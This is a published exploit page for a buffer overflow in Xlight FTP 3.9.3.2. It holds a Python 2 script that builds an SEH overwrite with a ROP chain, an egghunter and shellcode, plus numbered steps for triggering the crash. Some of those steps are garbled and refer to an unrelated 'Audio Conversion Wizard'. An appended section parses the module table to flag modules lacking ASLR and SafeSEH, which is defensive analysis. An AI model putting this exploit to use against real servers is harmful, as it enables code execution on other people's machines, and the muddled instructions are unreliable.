Xlight FTP 3.9.3.2 Buffer Overflow Exploit

Date: 23 Mar 2022
Reported by: Hejap Zairy
Type: zdt
Source: 0day.today


Code
# Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP)
# Exploit Author: Hejap Zairy
# Software Link:   http://www.xlightftpd.com/download/setup.exe
# Tested Version: v3.9.3.2(2022-1-5) 
# Tested on: Windows 10 64bit

# 1.- Run the python code: 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy all of its content to the clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 5.- Click 'Server ip' -> 'General' -> 'Advanced' -> 'Excute a program after user logged in' -> 'Setup'
# 6.- Crashed


#!/usr/bin/env python
# Author: Hejap Zairy
# Written for Python 2: the str and bytes literals below are concatenated directly.
import struct


##================================================================================
##  2022-03-12 16:54:06
##================================================================================
##-----------------------------------------------------------------------------------------------------------------------------------------
## Module info :
##-----------------------------------------------------------------------------------------------------------------------------------------
## Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
##-----------------------------------------------------------------------------------------------------------------------------------------
## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [SHLWAPI.dll] (C:\Windows\System32\SHLWAPI.dll)
## 0x76970000 | 0x76a93000 | 0x00123000 | True   | True    | True  |  False   | True   | 10.0.17763.1490 [ucrtbase.dll] (C:\Windows\System32\ucrtbase.dll)
## 0x766a0000 | 0x766bc000 | 0x0001c000 | True   | True    | True  |  False   | True   | 10.0.17763.1075 [profapi.dll] (C:\Windows\System32\profapi.dll)
## 0x76340000 | 0x763c0000 | 0x00080000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [msvcp_win.dll] (C:\Windows\System32\msvcp_win.dll)
## 0x75680000 | 0x757ea000 | 0x0016a000 | True   | True    | True  |  False   | True   | 10.0.17763.1879 [gdi32full.dll] (C:\Windows\System32\gdi32full.dll)
## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [CRYPT32.dll] (C:\Windows\System32\CRYPT32.dll)
## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [kernel.appcore.dll] (C:\Windows\System32\kernel.appcore.dll)
## 0x00400000 | 0x006d5000 | 0x002d5000 | False  | False   | False |  False   | False  | 3.9.3.2 [xlight.exe] (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
## 0x74870000 | 0x74909000 | 0x00099000 | True   | True    | True  |  False   | True   | 10.0.17763.1075 [ODBC32.dll] (C:\Windows\SYSTEM32\ODBC32.dll)
## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [apphelp.dll] (C:\Windows\SYSTEM32\apphelp.dll)
## 0x76280000 | 0x76297000 | 0x00017000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [win32u.dll] (C:\Windows\System32\win32u.dll)
## 0x75c50000 | 0x761a6000 | 0x00556000 | True   | True    | True  |  False   | True   | 10.0.17763.1911 [SHELL32.dll] (C:\Windows\System32\SHELL32.dll)


##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
# RopFunc syscall  null 
badchars = [0x00,0x0a,0x0d,0x3a,0xff]

buf =  b""
buf += b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"
buf += b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"
buf += b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"
buf += b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"
buf += b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"
buf += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"
buf += b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"
buf += b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
buf += b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"
buf += b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
buf += b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\xef"
buf += b"\xce\xe0\x60\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"
buf += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"
buf += b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"
buf += b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
buf += b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68"
buf += b"\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c"
buf += b"\x24\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x61\x69\x72"
buf += b"\x79\x68\x61\x70\x20\x5a\x68\x20\x48\x65\x6a\x68\x30"
buf += b"\x64\x61\x79\x31\xc9\x88\x4c\x24\x10\x89\xe1\x31\xd2"
buf += b"\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08"


def Hejap_rop_chain():

    Hejap_gadgets = [
      0x75c4f468,  # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR 
      0x7731c2a0,  # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR
      0x75deb176,  # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ebp:---]
      0x7545eebb,  # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR 
      0x75ff2bdb,  # & call esp [msvcp_win.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_ebx:---]
      0x755d53b2,  # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x74d241d7,  # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR 
      0x75e72ff1,  # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_edx:---]
      0x765a2dad,  # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x75297b65,  # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR 
      0x76a3b05a,  # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR 
      #[---INFO:gadgets_to_set_ecx:---]
      0x72bb29ef,  # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 
      0x7774f16b,  # &Writable location [ntdll.dll] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_edi:---]
      0x77275d3d,  # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR 
      0x75849686,  # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR
      #[---INFO:gadgets_to_set_eax:---]
      0x72bf2465,  # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR 
      0x90909090,  # nop
      #[---INFO:pushad:---]
      0x76a37959,  # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR 
    ]
    return ''.join(struct.pack('<I', _) for _ in Hejap_gadgets)

egg = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egg+="\xef\xb8\x68\x30\x30\x70\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
rop_chain = Hejap_rop_chain()
offset = 452
nseh = "\x90" * 4  
junk = "A" * (offset - len(nseh))
stackpivot = struct.pack('<I', 0x8e648b26 )  # POP ESP # POP EBP # RETN    ** [xlight.exe
#seh = struct.pack('<I', 0x0019ccb8 ) null

buffer = junk + nseh  +  stackpivot + rop_chain  +  "\x90" * 5 +  egg   + 'h00ph00p' + buf + "\x90" * (1000 - len(egg)-len(stackpivot))
f = open("0day_hejap.txt", "w")
f.write(buffer)
f.close()


# Proof and Exploit:
https://i.imgur.com/jMURHQF.png
https://i.imgur.com/aw6hZo2.png
#Video
https://streamable.com/gmqz5x
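The module table in the script header is the part of this page a defender should read first: xlight.exe is the only module loaded without Rebase, SafeSEH or ASLR, while every ROP gadget is annotated ** REBASED ** ASLR. The script below is an added example, not part of the original exploit: it parses four rows copied from that table, lists the modules lacking all three mitigations, and flags gadget addresses that fall outside the listed range of the module they are attributed to (the address/module pairs are copied from the script's own comments).

```python
import re

# Rows copied from the mona module table in the exploit header above; columns are
# Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version [Module] (Path).
MODULE_TABLE = r"""
## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [SHLWAPI.dll] (C:\Windows\System32\SHLWAPI.dll)
## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True   | True    | True  |  False   | True   | 10.0.17763.1 [CRYPT32.dll] (C:\Windows\System32\CRYPT32.dll)
## 0x00400000 | 0x006d5000 | 0x002d5000 | False  | False   | False |  False   | False  | 3.9.3.2 [xlight.exe] (C:\Users\Tarnished\Desktop\Xlight\xlight.exe)
## 0x75c50000 | 0x761a6000 | 0x00556000 | True   | True    | True  |  False   | True   | 10.0.17763.1911 [SHELL32.dll] (C:\Windows\System32\SHELL32.dll)
"""

# (address, module it is attributed to) pairs copied from the exploit's gadget comments.
GADGETS = [
    (0x7545eebb, "SHLWAPI.dll"),  # POP EBP # RETN
    (0x77275d3d, "CRYPT32.dll"),  # POP EDI # RETN
    (0x76a37959, "SHELL32.dll"),  # PUSHAD # RETN
    (0x8e648b26, "xlight.exe"),   # stack pivot: POP ESP # POP EBP # RETN
]

ROW_RE = re.compile(
    r"^##\s*(0x[0-9a-f]+)\s*\|\s*(0x[0-9a-f]+)\s*\|\s*0x[0-9a-f]+\s*\|"
    r"\s*(True|False)\s*\|\s*(True|False)\s*\|\s*(True|False)\s*\|"
    r"\s*(True|False)\s*\|\s*(True|False)\s*\|\s*\S+\s+\[([^\]]+)\]"
)

def parse_modules(table):
    """Return one dict per table row, with the mitigation columns as booleans."""
    mods = []
    for line in table.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        base, top, rebase, safeseh, aslr, nx, osdll, name = m.groups()
        mods.append({"name": name, "base": int(base, 16), "top": int(top, 16),
                     "rebase": rebase == "True", "safeseh": safeseh == "True",
                     "aslr": aslr == "True", "nxcompat": nx == "True"})
    return mods

def unprotected(mods):
    """Modules with no ASLR, no Rebase and no SafeSEH: fixed addresses, no SEH validation."""
    return [m["name"] for m in mods if not (m["aslr"] or m["rebase"] or m["safeseh"])]

def misattributed(mods, gadgets):
    """Gadgets whose address lies outside the listed range of the module they are attributed to."""
    ranges = {m["name"]: (m["base"], m["top"]) for m in mods}
    return [(a, n) for a, n in gadgets if not (ranges.get(n, (0, 0))[0] <= a < ranges.get(n, (0, 0))[1])]

if __name__ == "__main__":
    mods = parse_modules(MODULE_TABLE)
    print("modules without ASLR/Rebase/SafeSEH:", unprotected(mods))
    print("gadgets outside their module's listed range:", misattributed(mods, GADGETS))
```

With these rows all four sampled addresses fall outside their module's listed range; for the ASLR-enabled modules that is what the ** REBASED ** annotation records, and it is why such a chain is only valid for the session in which it was captured.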
